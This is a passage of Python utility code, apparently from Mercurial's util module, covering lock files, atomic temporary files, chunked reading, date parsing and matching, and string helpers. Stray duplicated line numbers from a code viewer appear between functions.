    fd = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
    os.write(fd, info)
    os.close(fd)
1386
1386
def readlock(pathname):
    """Return the info stored in the lock at pathname.

    Mirrors makelock(): try to read a symlink target first, then fall
    back to reading a regular lock file.
    """
    try:
        return os.readlink(pathname)
    except OSError as err:
        # EINVAL: not a symlink; ENOSYS: symlinks unsupported
        if err.errno not in (errno.EINVAL, errno.ENOSYS):
            raise
    except AttributeError: # no symlink in os
        pass
    fp = posixfile(pathname)
    data = fp.read()
    fp.close()
    return data
1399
1399
def fstat(fp):
    '''stat file object that may not have fileno method.'''
    try:
        fd = fp.fileno()
    except AttributeError:
        # not a real file: fall back to stat'ing it by name
        return os.stat(fp.name)
    return os.fstat(fd)
1406
1406
1407 # File system features
1407 # File system features
1408
1408
def fscasesensitive(path):
    """
    Return true if the given path is on a case-sensitive filesystem

    Requires a path (like /foo/.hg) ending with a foldable final
    directory component.
    """
    origstat = os.lstat(path)
    dirname, leaf = os.path.split(path)
    folded = leaf.upper()
    if folded == leaf:
        folded = leaf.lower()
    if folded == leaf:
        # name has no letters to fold: no evidence against case sensitivity
        return True
    try:
        foldedstat = os.lstat(os.path.join(dirname, folded))
    except OSError:
        # the case-folded variant doesn't exist: fs distinguishes case
        return True
    # same stat for both spellings means the fs folded them together
    return foldedstat != origstat
1431
1431
# Probe for the faster re2 regex engine.
# _re2 is a tristate: None = present but untested, False = unavailable,
# later set to True/False by _re._checkre2() once a test match is run.
try:
    import re2
    _re2 = None
except ImportError:
    _re2 = False
1437
1437
class _re(object):
    """Facade over the stdlib re module that prefers re2 when usable."""

    def _checkre2(self):
        # resolve the _re2 tristate by actually exercising re2
        global _re2
        try:
            # check if match works, see issue3964
            _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
        except ImportError:
            _re2 = False

    def compile(self, pat, flags=0):
        '''Compile a regular expression, using re2 if possible

        For best performance, use only re2-compatible regexp features. The
        only flags from the re module that are re2-compatible are
        IGNORECASE and MULTILINE.'''
        if _re2 is None:
            self._checkre2()
        re2flags = remod.IGNORECASE | remod.MULTILINE
        if _re2 and not (flags & ~re2flags):
            # re2 takes inline flags rather than a flags argument
            if flags & remod.IGNORECASE:
                pat = '(?i)' + pat
            if flags & remod.MULTILINE:
                pat = '(?m)' + pat
            try:
                return re2.compile(pat)
            except re2.error:
                pass
        return remod.compile(pat, flags)

    @propertycache
    def escape(self):
        '''Return the version of escape corresponding to self.compile.

        This is imperfect because whether re2 or re is used for a particular
        function depends on the flags, etc, but it's the best we can do.
        '''
        global _re2
        if _re2 is None:
            self._checkre2()
        return re2.escape if _re2 else remod.escape

re = _re()
1482
1482
# cache of {directory: {normcased name: on-disk name}} used by fspath()
_fspathcache = {}
def fspath(name, root):
    '''Get name in the case stored in the filesystem

    The name should be relative to root, and be normcase-ed for efficiency.

    Note that this function is unnecessary, and should not be
    called, for case-sensitive filesystems (simply because it's expensive).

    The root should be normcase-ed, too.
    '''
    def _makefspathcacheentry(dir):
        # map each entry's normcased form to its actual on-disk spelling
        return dict((normcase(n), n) for n in os.listdir(dir))

    seps = pycompat.ossep
    if pycompat.osaltsep:
        seps = seps + pycompat.osaltsep
    # Protect backslashes. This gets silly very quickly.
    # (str.replace returns a new string; the original code discarded the
    # result, making this a no-op — assign it so backslash separators are
    # actually escaped inside the character classes below)
    seps = seps.replace('\\', '\\\\')
    pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
    dir = os.path.normpath(root)
    result = []
    for part, sep in pattern.findall(name):
        if sep:
            # separator runs are passed through unchanged
            result.append(sep)
            continue

        if dir not in _fspathcache:
            _fspathcache[dir] = _makefspathcacheentry(dir)
        contents = _fspathcache[dir]

        found = contents.get(part)
        if not found:
            # retry "once per directory" per "dirstate.walk" which
            # may take place for each patches of "hg qpush", for example
            _fspathcache[dir] = contents = _makefspathcacheentry(dir)
            found = contents.get(part)

        result.append(found or part)
        dir = os.path.join(dir, part)

    return ''.join(result)
1525
1525
def checknlink(testfile):
    '''check whether hardlink count reporting works properly'''

    # testfile may be open, so we need a separate file for checking to
    # work around issue2543 (or testfile may get lost on Samba shares)
    probe1 = probe2 = keepopen = None
    try:
        fd, probe1 = tempfile.mkstemp(
            prefix='.%s-' % os.path.basename(testfile),
            suffix='1~', dir=os.path.dirname(testfile))
        os.close(fd)
        probe2 = '%s2~' % probe1[:-2]

        oslink(probe1, probe2)
        # nlinks() may behave differently for files on Windows shares if
        # the file is open.
        keepopen = posixfile(probe2)
        return nlinks(probe2) > 1
    except OSError:
        return False
    finally:
        if keepopen is not None:
            keepopen.close()
        for probe in (probe1, probe2):
            if probe is None:
                continue
            try:
                os.unlink(probe)
            except OSError:
                pass
1554
1554
def endswithsep(path):
    '''Check path ends with os.sep or os.altsep.'''
    if path.endswith(pycompat.ossep):
        return True
    # osaltsep may be empty/None on platforms with a single separator
    return pycompat.osaltsep and path.endswith(pycompat.osaltsep)
1559
1559
def splitpath(path):
    '''Split path by os.sep.
    Note that this function does not use os.altsep because this is
    an alternative of simple "xxx.split(os.sep)".
    It is recommended to use os.path.normpath() before using this
    function if need.'''
    sep = pycompat.ossep
    return path.split(sep)
1567
1567
def gui():
    '''Are we running in a GUI?'''
    if not pycompat.isdarwin:
        return pycompat.iswindows or encoding.environ.get("DISPLAY")
    # macOS-specific checks below
    if 'SSH_CONNECTION' in encoding.environ:
        # handle SSH access to a box where the user is logged in
        return False
    isgui = getattr(osutil, 'isgui', None)
    if isgui:
        # check if a CoreGraphics session is available
        return isgui()
    # pure build; use a safe default
    return True
1582
1582
def mktempcopy(name, emptyok=False, createmode=None):
    """Create a temporary file with the same contents from name

    The permission bits are copied from the original file.

    If the temporary file is going to be truncated immediately, you
    can use emptyok=True as an optimization.

    Returns the name of the temporary file.
    """
    dirpath, basename = os.path.split(name)
    fd, tmppath = tempfile.mkstemp(prefix='.%s-' % basename, suffix='~',
                                   dir=dirpath)
    os.close(fd)
    # Temporary files are created with mode 0600, which is usually not
    # what we want. If the original file already exists, just copy
    # its mode. Otherwise, manually obey umask.
    copymode(name, tmppath, createmode)
    if emptyok:
        return tmppath
    try:
        try:
            infile = posixfile(name, "rb")
        except IOError as inst:
            if inst.errno == errno.ENOENT:
                # no original to copy: the empty temp file is the answer
                return tmppath
            if not getattr(inst, 'filename', None):
                inst.filename = name
            raise
        outfile = posixfile(tmppath, "wb")
        for chunk in filechunkiter(infile):
            outfile.write(chunk)
        infile.close()
        outfile.close()
    except: # re-raises
        # don't leave a stale temp file behind on failure
        try:
            os.unlink(tmppath)
        except OSError:
            pass
        raise
    return tmppath
1623
1623
class filestat(object):
    """help to exactly detect change of a file

    The 'stat' attribute holds the result of 'os.stat()' when the
    examined path exists, and None otherwise.  Carrying None inside the
    object saves callers a separate preparative 'exists()' check.
    """
    def __init__(self, stat):
        self.stat = stat

    @classmethod
    def frompath(cls, path):
        """Build a filestat for 'path'; a missing file yields stat=None."""
        try:
            st = os.stat(path)
        except OSError as err:
            if err.errno != errno.ENOENT:
                raise
            st = None
        return cls(st)

    @classmethod
    def fromfp(cls, fp):
        """Build a filestat from an already-open file object."""
        return cls(os.fstat(fp.fileno()))

    __hash__ = object.__hash__

    def __eq__(self, old):
        mine = self.stat
        try:
            theirs = old.stat
        except AttributeError:
            # 'old' is not filestat-alike at all
            return False
        if mine is None or theirs is None:
            # missing files compare equal only to other missing files
            return mine is None and theirs is None
        try:
            # once ambiguity has been avoided, comparing size, ctime and
            # mtime is enough to exactly detect change of a file,
            # regardless of platform
            return (mine.st_size == theirs.st_size and
                    mine.st_ctime == theirs.st_ctime and
                    mine.st_mtime == theirs.st_mtime)
        except AttributeError:
            return False

    def isambig(self, old):
        """Examine whether new (= self) stat is ambiguous against old one

        "S[N]" below means stat of a file at N-th change:

        - S[n-1].ctime < S[n].ctime: can detect change of a file
        - S[n-1].ctime == S[n].ctime
          - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
          - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
          - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
        - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)

        Case (*2) means the file changed twice or more within the same
        second, so timestamp comparison cannot see the later change.
        Advancing mtime only in case (*2) is not enough, because a
        naturally advanced S[n].mtime in case (*1) might equal an mtime
        that was advanced manually earlier.  All "S[n-1].ctime ==
        S[n].ctime" cases are therefore treated as ambiguous, so that
        advancing mtime "if isambig(oldstat)" guarantees "S[n-1].mtime
        != S[n].mtime" even when the size of the file is unchanged.
        """
        try:
            return self.stat.st_ctime == old.stat.st_ctime
        except AttributeError:
            return False

    def avoidambig(self, path, old):
        """Change file stat of specified path to avoid ambiguity

        'old' should be the previous filestat of 'path'.

        Returns False when the process lacks appropriate privileges to
        adjust timestamps of 'path' (EPERM); True when ambiguity has
        been avoided.
        """
        newtime = (old.stat.st_mtime + 1) & 0x7fffffff
        try:
            os.utime(path, (newtime, newtime))
        except OSError as inst:
            if inst.errno != errno.EPERM:
                raise
            # utime() on a file created by another user raises EPERM
            # when this process lacks appropriate privileges
            return False
        return True

    def __ne__(self, other):
        return not (self == other)
1725
1725
class atomictempfile(object):
    '''writable file object that atomically updates a file

    All writes will go to a temporary copy of the original file. Call
    close() when you are done writing, and atomictempfile will rename
    the temporary copy to the original name, making the changes
    visible. If the object is destroyed without being closed, all your
    writes are discarded.

    checkambig argument of constructor is used with filestat, and is
    useful only if target file is guarded by any lock (e.g. repo.lock
    or repo.wlock).
    '''
    def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
        self.__name = name # permanent name
        # all writes land in a temporary sibling of the target; 'w' in
        # mode means the caller will truncate, so skip copying contents
        self._tempname = mktempcopy(name, emptyok=('w' in mode),
                                    createmode=createmode)
        self._fp = posixfile(self._tempname, mode)
        self._checkambig = checkambig

        # delegated methods
        self.read = self._fp.read
        self.write = self._fp.write
        self.seek = self._fp.seek
        self.tell = self._fp.tell
        self.fileno = self._fp.fileno

    def close(self):
        # commit: rename the temporary file over the permanent name,
        # making all accumulated writes visible at once
        if not self._fp.closed:
            self._fp.close()
            filename = localpath(self.__name)
            # oldstat is only gathered when checkambig was requested and
            # the target already exists; it is compared against the
            # post-rename stat to detect timestamp ambiguity
            oldstat = self._checkambig and filestat.frompath(filename)
            if oldstat and oldstat.stat:
                rename(self._tempname, filename)
                newstat = filestat.frompath(filename)
                if newstat.isambig(oldstat):
                    # stat of changed file is ambiguous to original one
                    advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
                    os.utime(filename, (advanced, advanced))
            else:
                rename(self._tempname, filename)

    def discard(self):
        # drop all writes: delete the temporary file without renaming it
        # over the permanent name
        if not self._fp.closed:
            try:
                os.unlink(self._tempname)
            except OSError:
                pass
            self._fp.close()

    def __del__(self):
        if safehasattr(self, '_fp'): # constructor actually did something
            self.discard()

    def __enter__(self):
        return self

    def __exit__(self, exctype, excvalue, traceback):
        # commit on clean exit, discard when an exception is in flight
        if exctype is not None:
            self.discard()
        else:
            self.close()
1788
1788
def unlinkpath(f, ignoremissing=False):
    """Remove the file 'f', then prune any directories left empty.

    With ignoremissing=True, a nonexistent 'f' is not an error.
    """
    remove = tryunlink if ignoremissing else unlink
    remove(f)
    # clean up parent directories that may have become empty
    try:
        removedirs(os.path.dirname(f))
    except OSError:
        pass
1800
1800
def tryunlink(f):
    """Remove the file 'f'; a missing file (ENOENT) is not an error."""
    try:
        unlink(f)
    except OSError as err:
        # only a nonexistent target is tolerated
        if err.errno == errno.ENOENT:
            return
        raise
1808
1808
def makedirs(name, mode=None, notindexed=False):
    """recursive directory creation with parent mode inheritance

    Newly created directories are marked as "not to be indexed by
    the content indexing service", if ``notindexed`` is specified
    for "write" mode access.
    """
    try:
        makedir(name, notindexed)
    except OSError as err:
        if err.errno == errno.EEXIST:
            return
        if err.errno != errno.ENOENT or not name:
            raise
        parent = os.path.dirname(os.path.abspath(name))
        if parent == name:
            # reached the filesystem root without an existing ancestor
            raise
        makedirs(parent, mode, notindexed)
        try:
            makedir(name, notindexed)
        except OSError as err:
            # Catch EEXIST to handle races; note that in that case the
            # chmod below is intentionally skipped, matching the
            # first-attempt EEXIST path
            if err.errno == errno.EEXIST:
                return
            raise
    if mode is not None:
        os.chmod(name, mode)
1836
1836
def readfile(path):
    """Return the entire content of the file at 'path' as bytes."""
    fp = open(path, 'rb')
    try:
        return fp.read()
    finally:
        fp.close()
1840
1840
def writefile(path, text):
    """Replace the content of the file at 'path' with 'text' (bytes)."""
    fp = open(path, 'wb')
    try:
        fp.write(text)
    finally:
        fp.close()
1844
1844
def appendfile(path, text):
    """Append 'text' (bytes) to the file at 'path', creating it if needed."""
    fp = open(path, 'ab')
    try:
        fp.write(text)
    finally:
        fp.close()
1848
1848
class chunkbuffer(object):
    """Allow arbitrary sized chunks of data to be efficiently read from an
    iterator over chunks of arbitrary size."""

    def __init__(self, in_iter):
        """in_iter is the iterator that's iterating over the input chunks."""
        def splitbig(chunks):
            # re-chunk anything larger than 1MB into 256KB pieces so no
            # single queue element is excessively large
            for chunk in chunks:
                if len(chunk) > 2**20:
                    pos = 0
                    while pos < len(chunk):
                        end = pos + 2 ** 18
                        yield chunk[pos:end]
                        pos = end
                else:
                    yield chunk
        self.iter = splitbig(in_iter)
        # chunks already pulled from the iterator but not yet consumed
        self._queue = collections.deque()
        # number of bytes of self._queue[0] already handed to callers
        self._chunkoffset = 0

    def read(self, l=None):
        """Read L bytes of data from the iterator of chunks of data.
        Returns less than L bytes if the iterator runs dry.

        If size parameter is omitted, read everything"""
        if l is None:
            return ''.join(self.iter)

        left = l
        buf = []
        queue = self._queue
        while left > 0:
            # refill the queue: buffer up to ~256KB ahead so small reads
            # don't have to hit the iterator every time
            if not queue:
                target = 2**18
                for chunk in self.iter:
                    queue.append(chunk)
                    target -= len(chunk)
                    if target <= 0:
                        break
                if not queue:
                    break

            # The easy way to do this would be to queue.popleft(), modify the
            # chunk (if necessary), then queue.appendleft(). However, for cases
            # where we read partial chunk content, this incurs 2 dequeue
            # mutations and creates a new str for the remaining chunk in the
            # queue. Our code below avoids this overhead.

            chunk = queue[0]
            chunkl = len(chunk)
            offset = self._chunkoffset

            # Use full chunk.
            if offset == 0 and left >= chunkl:
                left -= chunkl
                queue.popleft()
                buf.append(chunk)
                # self._chunkoffset remains at 0.
                continue

            chunkremaining = chunkl - offset

            # Use all of unconsumed part of chunk.
            if left >= chunkremaining:
                left -= chunkremaining
                queue.popleft()
                # offset == 0 is enabled by block above, so this won't merely
                # copy via ``chunk[0:]``.
                buf.append(chunk[offset:])
                self._chunkoffset = 0

            # Partial chunk needed.
            else:
                buf.append(chunk[offset:offset + left])
                self._chunkoffset += left
                left -= chunkremaining

        return ''.join(buf)
1928
1928
def filechunkiter(f, size=131072, limit=None):
    """Yield successive chunks read from the file object 'f'.

    Chunks are at most 'size' bytes (default 131072), and at most
    'limit' bytes are read in total when 'limit' is given.  A chunk may
    be shorter than 'size' when it is the last chunk of the file, or
    when 'f' is a socket or some other file-like object that sometimes
    reads less data than requested.
    """
    assert size >= 0
    assert limit is None or limit >= 0
    while True:
        nbytes = size if limit is None else min(limit, size)
        # nbytes can only be 0 once the limit is exhausted; the 'and'
        # short-circuit then avoids a pointless zero-length read
        data = nbytes and f.read(nbytes)
        if not data:
            break
        if limit:
            limit -= len(data)
        yield data
1949
1949
def makedate(timestamp=None):
    '''Return (unixtime, offset) for 'timestamp' (default: current time),
    where offset is the local timezone's distance from UTC in seconds.'''
    if timestamp is None:
        timestamp = time.time()
    if timestamp < 0:
        hint = _("check your clock")
        raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
    # derive the zone offset from the UTC/local interpretations of the
    # same instant rather than from time.timezone, so DST is honored
    utcmoment = datetime.datetime.utcfromtimestamp(timestamp)
    localmoment = datetime.datetime.fromtimestamp(timestamp)
    delta = utcmoment - localmoment
    tz = delta.days * 86400 + delta.seconds
    return timestamp, tz
1962
1962
def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
    """represent a (unixtime, offset) tuple as a localized time.
    unixtime is seconds since the epoch, and offset is the time zone's
    number of seconds away from UTC.

    >>> datestr((0, 0))
    'Thu Jan 01 00:00:00 1970 +0000'
    >>> datestr((42, 0))
    'Thu Jan 01 00:00:42 1970 +0000'
    >>> datestr((-42, 0))
    'Wed Dec 31 23:59:18 1969 +0000'
    >>> datestr((0x7fffffff, 0))
    'Tue Jan 19 03:14:07 2038 +0000'
    >>> datestr((-0x80000000, 0))
    'Fri Dec 13 20:45:52 1901 +0000'
    """
    t, tz = date or makedate()
    if "%1" in format or "%2" in format or "%z" in format:
        # expand the timezone placeholders: %z and the legacy %1 (sign
        # plus hours) / %2 (minutes) pair
        sign = "-" if tz > 0 else "+"
        hours, mins = divmod(abs(tz) // 60, 60)
        format = format.replace("%z", "%1%2")
        format = format.replace("%1", "%c%02d" % (sign, hours))
        format = format.replace("%2", "%02d" % mins)
    d = t - tz
    if d > 0x7fffffff:
        d = 0x7fffffff
    elif d < -0x80000000:
        d = -0x80000000
    # Never use time.gmtime() and datetime.datetime.fromtimestamp()
    # because they use the gmtime() system call which is buggy on Windows
    # for negative values; render via a timedelta from the epoch instead.
    t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
    s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
    return s
1998
1998
def shortdate(date=None):
    """Render a (timestamp, tzoff) tuple as an ISO 8601 'YYYY-MM-DD' date."""
    fmt = '%Y-%m-%d'
    return datestr(date, format=fmt)
2002
2002
def parsetimezone(s):
    """Split a trailing timezone, if any, off the string 's'.

    Returns an (offset, remainder) pair: offset is the zone's distance
    from UTC in seconds (None when no timezone was recognized), and
    remainder is 's' with the timezone suffix stripped.
    """
    def tosecs(signchar, hours, minutes):
        # a zone east of UTC ("+") yields a negative offset
        direction = 1 if signchar == "+" else -1
        return -direction * (hours * 60 + minutes) * 60

    # named UTC aliases
    if s.endswith("GMT") or s.endswith("UTC"):
        return 0, s[:-3].rstrip()

    # Unix-style [+-]hhmm
    if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
        offset = tosecs(s[-5], int(s[-4:-2]), int(s[-2:]))
        return offset, s[:-5].rstrip()

    # ISO 8601 trailing Z (UTC)
    if s.endswith("Z") and s[-2:-1].isdigit():
        return 0, s[:-1]

    # ISO 8601-style [+-]hh:mm
    if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
        s[-5:-3].isdigit() and s[-2:].isdigit()):
        offset = tosecs(s[-6], int(s[-5:-3]), int(s[-2:]))
        return offset, s[:-6]

    # no recognizable timezone suffix
    return None, s
2030
2030
def strdate(string, format, defaults=None):
    """parse a localized time string and return a (unixtime, offset) tuple.
    if the string cannot be parsed, ValueError is raised.

    'defaults' maps the specifier groups below ("S", "M", "HI", "d",
    "mb", "yY") to (biased, today) string pairs used to fill in
    elements missing from 'format' (parsedate builds this mapping).
    """
    if defaults is None:
        defaults = {}

    # NOTE: unixtime = localunixtime + offset
    offset, date = parsetimezone(string)

    # add missing elements from defaults
    usenow = False # default to using biased defaults
    for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
        part = pycompat.bytestr(part)
        found = [True for p in part if ("%"+p) in format]
        if not found:
            # pad both the date string and the format with a default
            # value, '@'-separated so strptime can match unambiguously
            date += "@" + defaults[part][usenow]
            format += "@%" + part[0]
        else:
            # We've found a specific time element, less specific time
            # elements are relative to today
            usenow = True

    timetuple = time.strptime(encoding.strfromlocal(date),
                              encoding.strfromlocal(format))
    # timegm() treats the tuple as UTC; mktime() treats it as local
    # time, so their difference is this machine's zone offset
    localunixtime = int(calendar.timegm(timetuple))
    if offset is None:
        # local timezone
        unixtime = int(time.mktime(timetuple))
        offset = unixtime - localunixtime
    else:
        unixtime = localunixtime + offset
    return unixtime, offset
2063
2063
def parsedate(date, formats=None, bias=None):
    """parse a localized date/time and return a (unixtime, offset) tuple.

    The date may be a "unixtime offset" string or in one of the specified
    formats. If the date already is a (unixtime, offset) tuple, it is returned.

    >>> parsedate(b' today ') == parsedate(
    ...     datetime.date.today().strftime('%b %d').encode('ascii'))
    True
    >>> parsedate(b'yesterday ') == parsedate(
    ...     (datetime.date.today() - datetime.timedelta(days=1)
    ...     ).strftime('%b %d').encode('ascii'))
    True
    >>> now, tz = makedate()
    >>> strnow, strtz = parsedate(b'now')
    >>> (strnow - now) < 1
    True
    >>> tz == strtz
    True
    """
    if bias is None:
        bias = {}
    if not date:
        return 0, 0
    if isinstance(date, tuple) and len(date) == 2:
        # already parsed
        return date
    if not formats:
        formats = defaultdateformats
    date = date.strip()

    # symbolic dates are turned into concrete "%b %d" strings below
    if date == 'now' or date == _('now'):
        return makedate()
    if date == 'today' or date == _('today'):
        date = datetime.date.today().strftime(r'%b %d')
        date = encoding.strtolocal(date)
    elif date == 'yesterday' or date == _('yesterday'):
        date = (datetime.date.today() -
                datetime.timedelta(days=1)).strftime(r'%b %d')
        date = encoding.strtolocal(date)

    try:
        # fast path: the internal "unixtime offset" representation
        when, offset = map(int, date.split(' '))
    except ValueError:
        # fill out defaults
        now = makedate()
        defaults = {}
        for part in ("d", "mb", "yY", "HI", "M", "S"):
            # this piece is for rounding the specific end of unknowns
            b = bias.get(part)
            if b is None:
                if part[0:1] in "HMS":
                    b = "00"
                else:
                    b = "0"

            # this piece is for matching the generic end to today's date
            n = datestr(now, "%" + part[0:1])

            defaults[part] = (b, n)

        # try each candidate format until one parses; the for/else
        # raises when none of them matched
        for format in formats:
            try:
                when, offset = strdate(date, format, defaults)
            except (ValueError, OverflowError):
                pass
            else:
                break
        else:
            raise error.ParseError(_('invalid date: %r') % date)
    # validate explicit (probably user-specified) date and
    # time zone offset. values must fit in signed 32 bits for
    # current 32-bit linux runtimes. timezones go from UTC-12
    # to UTC+14
    if when < -0x80000000 or when > 0x7fffffff:
        raise error.ParseError(_('date exceeds 32 bits: %d') % when)
    if offset < -50400 or offset > 43200:
        raise error.ParseError(_('impossible time zone offset: %d') % offset)
    return when, offset
2142
2142
def matchdate(date):
    """Return a function that matches a given date match specifier

    Formats include:

    '{date}' match a given date to the accuracy provided

    '<{date}' on or before a given date

    '>{date}' on or after a given date

    >>> p1 = parsedate(b"10:29:59")
    >>> p2 = parsedate(b"10:30:00")
    >>> p3 = parsedate(b"10:30:59")
    >>> p4 = parsedate(b"10:31:00")
    >>> p5 = parsedate(b"Sep 15 10:30:00 1999")
    >>> f = matchdate(b"10:30")
    >>> f(p1[0])
    False
    >>> f(p2[0])
    True
    >>> f(p3[0])
    True
    >>> f(p4[0])
    False
    >>> f(p5[0])
    False
    """

    def lowerbound(date):
        # round every unspecified field down (Jan 1st, midnight)
        d = {'mb': "1", 'd': "1"}
        return parsedate(date, extendeddateformats, d)[0]

    def upperbound(date):
        # round every unspecified field up; probe month lengths from
        # longest to shortest so e.g. "Feb" ends up on the right day
        d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
        for daysinmonth in ("31", "30", "29"):
            d["d"] = daysinmonth
            try:
                return parsedate(date, extendeddateformats, d)[0]
            except Abort:
                pass
        d["d"] = "28"
        return parsedate(date, extendeddateformats, d)[0]

    date = date.strip()

    if not date:
        raise Abort(_("dates cannot consist entirely of whitespace"))
    elif date[0] == "<":
        if not date[1:]:
            raise Abort(_("invalid day spec, use '<DATE'"))
        when = upperbound(date[1:])
        return lambda x: x <= when
    elif date[0] == ">":
        if not date[1:]:
            raise Abort(_("invalid day spec, use '>DATE'"))
        when = lowerbound(date[1:])
        return lambda x: x >= when
    elif date[0] == "-":
        # "-N": everything within the last N days
        try:
            days = int(date[1:])
        except ValueError:
            raise Abort(_("invalid day spec: %s") % date[1:])
        if days < 0:
            raise Abort(_("%s must be nonnegative (see 'hg help dates')")
                        % date[1:])
        when = makedate()[0] - days * 3600 * 24
        return lambda x: x >= when
    elif " to " in date:
        # explicit inclusive range
        a, b = date.split(" to ")
        start, stop = lowerbound(a), upperbound(b)
        return lambda x: x >= start and x <= stop
    else:
        # a bare date matches the whole span it denotes
        start, stop = lowerbound(date), upperbound(date)
        return lambda x: x >= start and x <= stop
2218
2218
def stringmatcher(pattern, casesensitive=True):
    """
    accepts a string, possibly starting with 're:' or 'literal:' prefix.
    returns the matcher name, pattern, and matcher function.
    missing or unknown prefixes are treated as literal matches.

    helper for tests:
    >>> def test(pattern, *tests):
    ...     kind, pattern, matcher = stringmatcher(pattern)
    ...     return (kind, pattern, [bool(matcher(t)) for t in tests])
    >>> def itest(pattern, *tests):
    ...     kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
    ...     return (kind, pattern, [bool(matcher(t)) for t in tests])

    exact matching (no prefix):
    >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
    ('literal', 'abcdefg', [False, False, True])

    regex matching ('re:' prefix)
    >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
    ('re', 'a.+b', [False, False, True])

    force exact matches ('literal:' prefix)
    >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
    ('literal', 're:foobar', [False, True])

    unknown prefixes are ignored and treated as literals
    >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
    ('literal', 'foo:bar', [False, False, True])

    case insensitive regex matches
    >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
    ('re', 'A.+b', [False, False, True])

    case insensitive literal matches
    >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
    ('literal', 'ABCDEFG', [False, False, True])
    """
    if pattern.startswith('re:'):
        pattern = pattern[3:]
        flags = 0 if casesensitive else remod.I
        try:
            compiled = remod.compile(pattern, flags)
        except remod.error as e:
            raise error.ParseError(_('invalid regular expression: %s')
                                   % e)
        return 're', pattern, compiled.search

    # anything else is a literal; strip an explicit 'literal:' prefix
    if pattern.startswith('literal:'):
        pattern = pattern[8:]

    if casesensitive:
        match = pattern.__eq__
    else:
        ipat = encoding.lower(pattern)
        match = lambda s: ipat == encoding.lower(s)
    return 'literal', pattern, match
2277
2277
def shortuser(user):
    """Return a short representation of a user name or email address."""
    # drop the domain, then anything before '<', then truncate at the
    # first space or dot: "John Doe <john.doe@x>" -> "john"
    at = user.find('@')
    if at >= 0:
        user = user[:at]
    lt = user.find('<')
    if lt >= 0:
        user = user[lt + 1:]
    for sep in (' ', '.'):
        idx = user.find(sep)
        if idx >= 0:
            user = user[:idx]
    return user
2293
2293
def emailuser(user):
    """Return the user portion of an email address."""
    # strip "@domain", then any "Real Name <" prefix
    at = user.find('@')
    if at >= 0:
        user = user[:at]
    lt = user.find('<')
    if lt >= 0:
        user = user[lt + 1:]
    return user
2303
2303
def email(author):
    '''get email of author.'''
    # take whatever sits between '<' and '>'; with neither present this
    # degenerates to returning the whole string
    end = author.find('>')
    if end == -1:
        end = None
    return author[author.find('<') + 1:end]
2310
2310
def ellipsis(text, maxlength=400):
    """Trim string to at most maxlength (default: 400) columns in display."""
    # delegate to the width-aware trimmer so wide (CJK) chars count as 2
    return encoding.trim(text, maxlength, ellipsis='...')
2314
2314
def unitcountfn(*unittable):
    '''return a function that renders a readable count of some quantity

    unittable rows are (multiplier, divisor, format); the first row whose
    threshold (multiplier * divisor) the magnitude reaches wins.
    '''

    def render(count):
        magnitude = abs(count)
        for mult, div, fmt in unittable:
            if magnitude >= div * mult:
                return fmt % (count / float(div))
        # nothing matched: fall back to the last (smallest-unit) row
        return unittable[-1][2] % count

    return render
2325
2325
def processlinerange(fromline, toline):
    """Check that linerange <fromline>:<toline> makes sense and return a
    0-based range.

    >>> processlinerange(10, 20)
    (9, 20)
    >>> processlinerange(2, 1)
    Traceback (most recent call last):
    ...
    ParseError: line range must be positive
    >>> processlinerange(0, 5)
    Traceback (most recent call last):
    ...
    ParseError: fromline must be strictly positive
    """
    if fromline > toline:
        raise error.ParseError(_("line range must be positive"))
    if fromline < 1:
        raise error.ParseError(_("fromline must be strictly positive"))
    # convert the 1-based inclusive spec into a 0-based half-open range
    return fromline - 1, toline
2346
2346
# human-readable byte counts: choose the coarsest unit that still yields
# a value >= the row's multiplier, varying precision with magnitude
bytecount = unitcountfn(
    (100, 1 << 30, _('%.0f GB')),
    (10, 1 << 30, _('%.1f GB')),
    (1, 1 << 30, _('%.2f GB')),
    (100, 1 << 20, _('%.0f MB')),
    (10, 1 << 20, _('%.1f MB')),
    (1, 1 << 20, _('%.2f MB')),
    (100, 1 << 10, _('%.0f KB')),
    (10, 1 << 10, _('%.1f KB')),
    (1, 1 << 10, _('%.2f KB')),
    (1, 1, _('%.0f bytes')),
    )
2359
2359
# Matches a single EOL which can either be a CRLF where repeated CR
# are removed or a LF. We do not care about old Macintosh files, so a
# stray CR is an error.
_eolre = remod.compile(br'\r*\n')

def tolf(s):
    """Normalize every line ending in s to a bare LF."""
    return _eolre.sub('\n', s)

def tocrlf(s):
    """Normalize every line ending in s to CRLF."""
    return _eolre.sub('\r\n', s)
2370
2370
if pycompat.oslinesep == '\r\n':
    # Windows: translate between LF-internal and CRLF-native text
    tonativeeol = tocrlf
    fromnativeeol = tolf
else:
    # POSIX line endings are already LF, so both directions are no-ops
    tonativeeol = pycompat.identity
    fromnativeeol = pycompat.identity
2377
2377
def escapestr(s):
    """Return s with special bytes rendered as backslash escapes.

    Calls the codec underlying s.encode('string_escape') directly for
    Python 3 compatibility.
    """
    encoded, _consumed = codecs.escape_encode(s)
    return encoded
2382
2382
def unescapestr(s):
    """Inverse of escapestr: interpret backslash escapes in s."""
    decoded, _consumed = codecs.escape_decode(s)
    return decoded
2385
2385
def forcebytestr(obj):
    """Portably format an arbitrary object (e.g. exception) into a byte
    string."""
    try:
        return pycompat.bytestr(obj)
